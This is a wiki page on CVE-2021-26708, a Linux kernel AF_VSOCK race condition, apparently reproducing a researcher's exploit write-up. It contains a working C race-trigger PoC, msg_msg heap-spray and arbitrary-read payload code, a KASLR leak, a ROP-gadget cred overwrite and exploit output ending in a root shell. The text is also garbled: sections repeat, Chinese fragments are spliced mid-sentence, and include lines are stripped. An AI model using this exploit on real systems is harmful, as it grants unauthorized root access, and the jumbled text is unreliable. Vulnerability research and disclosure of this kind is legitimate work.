# CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/en
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. These conditional competitions were implicitly introduced in the submission that added VSOCK multi-transport support in November 2019, and were merged into the Linux kernel 5.5-rc1 version.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.
==Memory corruption==
The following is a detailed introduction to the use of CVE-2021-26708, using the conditional competition in vsock_stream_etssockopt(). Two threads are required to reproduce. The first thread calls setsockopt() :
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
&size, sizeof(unsigned long));
The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:
struct sockaddr_vm addr = {
.svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
if (vsk->transport == new_transport)
return 0;
/* transport->release() must be called with sock lock acquired.
* This path can only be taken during vsock_stream_connect(),
* where we have already held the sock lock.
* In the other cases, this function is called on a new socket
* which is not assigned to any transport.
*/
vsk->transport->release(vsk);
vsock_deassign_transport(vsk);
}
vsock_stream_connect() contains a socket lock, and vsock_stream_setsockopt() in the parallel thread also tries to obtain it, which constitutes a conditional competition. Therefore, when the second connect() is performed with a different svm_cid, the vsock_deassign_transport() function is called. This function executes virtio_transport_destruct(), releases vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue to execute. It calls vsock_update_buffer_size(), and then calls transport->notify_buffer_size(). Here transport contains an outdated value from a local variable, which does not match vsk->transport (the original value is set to NULL).
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
struct virtio_vsock_sock *vvs = vsk->trans;
if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
*val = VIRTIO_VSOCK_MAX_BUF_SIZE;
vvs->buf_alloc = *val;
virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
virtio_transport_destruct()中被释放。struct virtio_vsock_sock的大小为64字节,位于kmalloc-64块缓存中。buf_alloc字段类型为u32,位于偏移量40。VIRTIO_VSOCK_MAX_BUF_SIZE是0xFFFFFFFFUL。*val的值由攻击者控制,它的四个最不重要的字节被写入释放的内存中。
vsock_update_buffer_size()有所發現:
if (val != vsk->buffer_size &&
transport && transport->notify_buffer_size)
transport->notify_buffer_size(vsk, &val);
vsk->buffer_size = val;
notify_buffer_size(),也就是說setsockopt()執行SO_VM_SOCKETS_BUFFER_SIZE時,每次調用的size參數都應該不同。於是我構建了相關代碼:
/* * AF_VSOCK vulnerability trigger. * It's a PoC just for fun. * Author: Alexander Popov. */ #include #include #include #include #include #include #define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define MAX_RACE_LAG_USEC 50 int vsock = -1; int tfail = 0; pthread_barrier_t barrier; int thread_sync(long lag_nsec) { int ret = -1; struct timespec ts0; struct timespec ts; long delta_nsec = 0; ret = pthread_barrier_wait(&barrier); if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) { perror("[-] pthread_barrier_wait"); return EXIT_FAILURE; } ret = clock_gettime(CLOCK_MONOTONIC, &ts0); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } while (delta_nsec < lag_nsec) { ret = clock_gettime(CLOCK_MONOTONIC, &ts); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 + ts.tv_nsec - ts0.tv_nsec; } return EXIT_SUCCESS; } void *th_connect(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct sockaddr_vm addr = { .svm_family = AF_VSOCK, }; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } addr.svm_cid = VMADDR_CID_LOCAL; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); addr.svm_cid = VMADDR_CID_HYPERVISOR; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); return NULL; } void *th_setsockopt(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct timespec tp; unsigned long size = 0; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } clock_gettime(CLOCK_MONOTONIC, &tp); size = tp.tv_nsec; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(unsigned long)); return NULL; } int main(void) { int ret = -1; unsigned long size = 0; long loop = 0; pthread_t th[2] = { 0 }; vsock = socket(AF_VSOCK, SOCK_STREAM, 0); if (vsock == -1) err_exit("[-] open vsock"); printf("[+] AF_VSOCK socket is opened\n"); size = 1; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(unsigned long)); size = 0xfffffffffffffffdlu; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE, &size, sizeof(unsigned long)); ret = pthread_barrier_init(&barrier, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); for (loop = 0; loop < 30000; loop++) { long tmo1 = 0; long tmo2 = loop % MAX_RACE_LAG_USEC; printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2); ret = pthread_create(&th[0], NULL, th_connect, &tmo1); if (ret != 0) err_exit("[-] pthread_create #0"); ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2); if (ret != 0) err_exit("[-] pthread_create #1"); ret = pthread_join(th[0], NULL); if (ret != 0) err_exit("[-] pthread_join #0"); ret = pthread_join(th[1], NULL); if (ret != 0) err_exit("[-] pthread_join #1"); if (tfail) { printf("[-] some thread got troubles\n"); exit(EXIT_FAILURE); } } ret = close(vsock); if (ret) perror("[-] close"); printf("[+] now see your warnings in the kernel log\n"); return 0; }
clock_gettime()返回的納秒數,每次都可能不同。原始的syzkaller不會這麼處理,因為在syzkaller生成 fuzzing輸入時,syscall參數的值被確定,執行時不會改變。
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
vsock_deassign_transport(),將vsk->transport設置為NULL,使得vsock_stream_setsockopt()在內存崩潰後調用virtio_transport_send_pkt_info(),出現內核告警:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34 ... CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014 RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common] ... RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80 RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0 RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000 R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008 R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0 FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0 Call Trace: virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common] vsock_update_buffer_size+0x5f/0x70 [vsock] vsock_stream_setsockopt+0x128/0x270 [vsock] ...
執行堆噴,用受控數據覆蓋該對象
使用損壞的對象進行權限升級
內核實現的System V消息有限制最大值DATALEN_MSG,即PAGE_SIZE減去sizeof(struct msg_msg))。如果你發送了更大的消息,剩餘的消息會被保存在消息段的列表中。 msg_msg中包含struct msg_msgseg *next用於指向第一個段,size_t m_ts用於存儲大小。當進行覆蓋操作時,就可以把受控的值放在msg_msg.m_ts和msg_msg.next中:

Payload:
#define PAYLOAD_SZ 40
void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
struct msg_msg *msg_ptr;
xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0xa5, PAGE_SIZE * 4);
printf("[+] adapt the msg_msg spraying payload:\n");
msg_ptr = (struct msg_msg *)xattr_addr;
msg_ptr->m_type = 0x1337;
msg_ptr->m_ts = ARB_READ_SZ;
msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
msg_ptr,
msg_ptr->m_type, &(msg_ptr->m_type),
msg_ptr->m_ts, &(msg_ptr->m_ts),
msg_ptr->next, &(msg_ptr->next));
}
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
使用sched_getaffinity()和CPU_COUNT()計算可用的CPU數量(該漏洞至少需要兩個);
打開/dev/kmsg進行解析;
mmap()將spray_data內存區域配置userfaultfd()作為最後一部分;
啟動一個單獨的pthread來處理userfaultfd()事件;
啟動127個threads用於msg_msg上的setxattr()&userfaultfd()堆噴射,並將它們掛在thread_barrier上;
獲取原始msg_msg的內核地址:
在虛擬套接字上進行條件競爭;
在第二個connect()後,在忙循環中等待35微秒;
調用msgsnd()來建立一個單獨的消息隊列;在內存破壞後,msg_msg對像被放置在virtio_vsock_sock位置;
解析內核日誌,從內核警告(RCX寄存器)中保存msg_msg的內核地址;
同時,從RBX寄存器中保存vsock_sock的內核地址;
使用損壞的 msg_msg對原始msg_msg執行任意釋放:
使用原始 msg_msg地址的4個字節作為 SO_VM_SOCKETS_BUFFER_SIZE,用於實現內存破壞;
在虛擬套接字上進行條件競爭;
在第二個connect()之後馬上調用msgsnd();msg_msg被放置在virtio_vsock_sock的位置,實現破壞;
現在被破壞的msg_msg的security指針存儲原始msg_msg的地址(來自步驟2);

在這種情況下,msgsnd()返回-1,損壞的msg_msg被銷毀;釋放msg_msg.security可以釋放原始msg_msg;
用一個可控的payload 覆蓋原始msg_msg:
msgsnd()失敗後,漏洞就會調用pthread_barrier_wait(),調用127個用於堆噴射的pthreads;
這些pthreads執行setxattr()的payload;
原始msg_msg被可控的數據覆蓋,msg_msg.next指針存儲vsock_sock對象的地址;

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
1.專用的塊緩存,如PINGv6和sock_inode_cache有很多指向對象的指針
2.struct mem_cgroup *sk_memcg指針在vsock_sock.sk偏移量664處。 mem_cgroup結構是在kmalloc-4k塊緩存中分配的。
3.const struct cred *owner指針在vsock_sock.sk偏移量840處,存儲了可以覆蓋進行權限升級的憑證的地址。
4.void (*sk_write_space)(struct sock *)函數指針在vsock_sock.sk偏移量688處,被設置為sock_def_write_space()內核函數的地址。它可以用來計算KASLR偏移量。
#define SK_MEMCG_RD_LOCATION (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET 840
#define OWNER_CRED_RD_LOCATION (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET 688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)
/*
* From Linux kernel 5.10.11-200.fc33.x86_64:
* function pointer for calculating KASLR secret
*/
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0lu
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;
/* ... */
sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
sk_memcg, SK_MEMCG_RD_LOCATION);
owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
owner_cred, OWNER_CRED_RD_LOCATION);
sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);
kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
#define SKB_SIZE 4096
#define SKB_SHINFO_OFFSET 3776
#define MY_UINFO_OFFSET 256
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void prepare_xattr_vs_skb_spray(void)
{
struct skb_shared_info *info = NULL;
xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0x0, PAGE_SIZE * 4);
info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
info->tx_flags = SKBTX_DEV_ZEROCOPY;
info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;
uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

/*
* A single ROP gadget for arbitrary write:
* mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
* Here rdi stores uinfo_p address, rcx is 0, rsi is 1
*/
uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. These conditional competitions were implicitly introduced in the submission that added VSOCK multi-transport support in November 2019, and were merged into the Linux kernel 5.5-rc1 version.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.
==Memory corruption==
The following is a detailed introduction to the use of CVE-2021-26708, using the conditional competition in vsock_stream_etssockopt(). Two threads are required to reproduce. The first thread calls setsockopt() :
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
&size, sizeof(unsigned long));
The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:
struct sockaddr_vm addr = {
.svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
if (vsk->transport == new_transport)
return 0;
/* transport->release() must be called with sock lock acquired.
* This path can only be taken during vsock_stream_connect(),
* where we have already held the sock lock.
* In the other cases, this function is called on a new socket
* which is not assigned to any transport.
*/
vsk->transport->release(vsk);
vsock_deassign_transport(vsk);
}
vsock_stream_connect() contains a socket lock, and vsock_stream_setsockopt() in the parallel thread also tries to obtain it, which constitutes a conditional competition. Therefore, when the second connect() is performed with a different svm_cid, the vsock_deassign_transport() function is called. This function executes virtio_transport_destruct(), releases vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue to execute. It calls vsock_update_buffer_size(), and then calls transport->notify_buffer_size(). Here transport contains an outdated value from a local variable, which does not match vsk->transport (the original value is set to NULL).
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
struct virtio_vsock_sock *vvs = vsk->trans;
if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
*val = VIRTIO_VSOCK_MAX_BUF_SIZE;
vvs->buf_alloc = *val;
virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
Here, vvs is a pointer to the kernel memory, which has been released in virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes and is located in the kmalloc-64 block cache. The buf_alloc field type is u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least important bytes are written into the freed memory.
==Fuzzing==
The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:
if (val != vsk->buffer_size &&
transport && transport->notify_buffer_size)
transport->notify_buffer_size(vsk, &val);
vsk->buffer_size = val;
Only when val is different from the current buffer_size, will notify_buffer_size() be called, that is to say, when setsockopt() executes SO_VM_SOCKETS_BUFFER_SIZE, every time The size parameters of the call should all be different. So I built the relevant code:
/* * AF_VSOCK vulnerability trigger. * It's a PoC just for fun. * Author: Alexander Popov. */ #include #include #include #include #include #include #define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define MAX_RACE_LAG_USEC 50 int vsock = -1; int tfail = 0; pthread_barrier_t barrier; int thread_sync(long lag_nsec) { int ret = -1; struct timespec ts0; struct timespec ts; long delta_nsec = 0; ret = pthread_barrier_wait(&barrier); if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) { perror("[-] pthread_barrier_wait"); return EXIT_FAILURE; } ret = clock_gettime(CLOCK_MONOTONIC, &ts0); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } while (delta_nsec < lag_nsec) { ret = clock_gettime(CLOCK_MONOTONIC, &ts); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 + ts.tv_nsec - ts0.tv_nsec; } return EXIT_SUCCESS; } void *th_connect(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct sockaddr_vm addr = { .svm_family = AF_VSOCK, }; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } addr.svm_cid = VMADDR_CID_LOCAL; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); addr.svm_cid = VMADDR_CID_HYPERVISOR; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); return NULL; } void *th_setsockopt(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct timespec tp; unsigned long size = 0; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } clock_gettime(CLOCK_MONOTONIC, &tp); size = tp.tv_nsec; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(unsigned long)); return NULL; } int main(void) { int ret = -1; unsigned long size = 0; long loop = 0; pthread_t th[2] = { 0 }; vsock = socket(AF_VSOCK, SOCK_STREAM, 0); if (vsock == -1) err_exit("[-] open vsock"); printf("[+] AF_VSOCK socket is opened\n"); size = 1; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(unsigned long)); size = 0xfffffffffffffffdlu; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE, &size, sizeof(unsigned long)); ret = pthread_barrier_init(&barrier, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); for (loop = 0; loop < 30000; loop++) { long tmo1 = 0; long tmo2 = loop % MAX_RACE_LAG_USEC; printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2); ret = pthread_create(&th[0], NULL, th_connect, &tmo1); if (ret != 0) err_exit("[-] pthread_create #0"); ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2); if (ret != 0) err_exit("[-] pthread_create #1"); ret = pthread_join(th[0], NULL); if (ret != 0) err_exit("[-] pthread_join #0"); ret = pthread_join(th[1], NULL); if (ret != 0) err_exit("[-] pthread_join #1"); if (tfail) { printf("[-] some thread got troubles\n"); exit(EXIT_FAILURE); } } ret = close(vsock); if (ret) perror("[-] close"); printf("[+] now see your warnings in the kernel log\n"); return 0; }
The size value here is taken from the number of nanoseconds returned by clock_gettime(), which may be different each time. The original syzkaller will not do this, because when syzkaller generates fuzzing input, the value of the syscall parameter is determined and will not change during execution.
== The power of four bytes ==
Here I choose Fedora 33 Server as the research target, the kernel version is 5.10.11-200.fc33.x86_64, and I am determined to bypass SMEP and SMAP.
In the first step, I started to study stable heap spraying, which exploited the execution of user space activities to cause the kernel to allocate another 64-byte object at the location of the released virtio_vsock_sock. After several experimental attempts, it was confirmed that the released virtio_vsock_sock was overwritten, indicating that heap spraying is feasible. Finally I found msgsnd() syscall. It creates struct msg_msg in the kernel space, see pahole output:
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
The front is the message header, and the back is the message data. If the struct msgbuf in the user space has a 16-byte mtext, the corresponding msg_msg will be created in the kmalloc-64 block cache. A 4-byte write-after-free will destroy the void *security pointer at offset 40. The msg_msg.security field points to the kernel data allocated by lsm_msg_msg_alloc(). When msg_msg is received, it will be released by security_msg_msg_free(). Therefore, by destroying the first half of the security pointer, arbitrary free can be obtained.
==Kernel Information Leak==
Here is used [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D %87%E6%BC%8F%E6%B4%9E CVE-2019-18683] the same technique. The second connect() of the virtual socket calls vsock_deassign_transport() and sets vsk->transport to NULL, making vsock_stream_setsockopt() Calling virtio_transport_send_pkt_info() after the memory crash, a kernel warning appears:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34 ... CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014 RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common] ... RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80 RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0 RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000 R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008 R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0 FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0 Call Trace: virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common] vsock_update_buffer_size+0x5f/0x70 [vsock] vsock_stream_setsockopt+0x128/0x270 [vsock] ...
Through gdb debugging, it is found that the RCX register contains the kernel address of the released virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.
==Achieve arbitrary reading==
===From arbitrary free to use-after-free===
Release an object from the leaked kernel address
Perform heap spray and cover the object with controlled data
Use damaged objects for privilege escalation
The System V message implemented by the kernel has a maximum limit of DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg)). If you send a larger message, the remaining messages will be saved in the list of message segments. The msg_msg contains struct msg_msgseg *next to point to the first segment, and size_t m_ts is used to store the size. When performing an overwrite operation, you can put the controlled value in msg_msg.m_ts and msg_msg.next:

Payload:
#define PAYLOAD_SZ 40
void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
struct msg_msg *msg_ptr;
xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0xa5, PAGE_SIZE * 4);
printf("[+] adapt the msg_msg spraying payload:\n");
msg_ptr = (struct msg_msg *)xattr_addr;
msg_ptr->m_type = 0x1337;
msg_ptr->m_ts = ARB_READ_SZ;
msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
msg_ptr,
msg_ptr->m_type, &(msg_ptr->m_type),
msg_ptr->m_ts, &(msg_ptr->m_ts),
msg_ptr->next, &(msg_ptr->next));
}
But how to use msg_msg to read kernel data? By reading the msgrcv() system call documentation, I found a good solution, using msgrcv() and MSG flags:
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
This flag causes the kernel to copy the message data to the user space without deleting it from the message queue. If the kernel has CONFIG_CHECKPOINT_RESTORE=y, then MSG is available and applicable in Fedora Server.
使用sched_getaffinity()和CPU_COUNT()計算可用的CPU數量(該漏洞至少需要兩個);
打開/dev/kmsg進行解析;
mmap()將spray_data內存區域配置userfaultfd()作為最後一部分;
啟動一個單獨的pthread來處理userfaultfd()事件;
啟動127個threads用於msg_msg上的setxattr()&userfaultfd()堆噴射,並將它們掛在thread_barrier上;
獲取原始msg_msg的內核地址:
在虛擬套接字上進行條件競爭;
在第二個connect()後,在忙循環中等待35微秒;
調用msgsnd()來建立一個單獨的消息隊列;在內存破壞後,msg_msg對像被放置在virtio_vsock_sock位置;
解析內核日誌,從內核警告(RCX寄存器)中保存msg_msg的內核地址;
同時,從RBX寄存器中保存vsock_sock的內核地址;
使用損壞的 msg_msg對原始msg_msg執行任意釋放:
使用原始 msg_msg地址的4個字節作為 SO_VM_SOCKETS_BUFFER_SIZE,用於實現內存破壞;
在虛擬套接字上進行條件競爭;
